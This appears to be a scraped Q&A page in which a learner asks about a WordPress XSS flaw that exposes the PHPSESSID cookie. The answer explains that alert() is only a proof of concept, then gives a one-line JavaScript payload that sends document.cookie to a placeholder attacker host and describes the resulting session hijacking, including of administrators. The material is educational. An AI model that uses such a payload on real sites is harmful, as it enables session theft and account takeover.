security - Wordpress XSS vulnerabilty (grabbing PHPSESSID) -


i started study vulnerability of websites , i've got doubt wordpress's xss vulnerability. exploit, attacker can grab phpsessid simple javascript's command:

(alert(document.cookie)) 

how can attacker use this? serious security problem or not?

an alert(…) proof of concept demonstrates successful exploitation of xss vulnerability. not used in actual attack doesn’t give attacker benefit.

in real attack, attacker try value of document.cookie somehow. simple example use javascript forge simple http request contains value of document.cookie this:

new image().src="http://evil.example/?"+document.cookie 

this creates image attacker’s url image source has cookie appended it.

with victim’s cookie, attacker may able hijack victim’s session , use wordpress same privileges victim. in case victim administrator, attacker have access administrative functions.


Comments

Popular posts from this blog

Perl - how to grep a block of text from a file -

delphi - How to remove all the grips on a coolbar if I have several coolbands? -

javascript - Animating array of divs; only the final element is modified -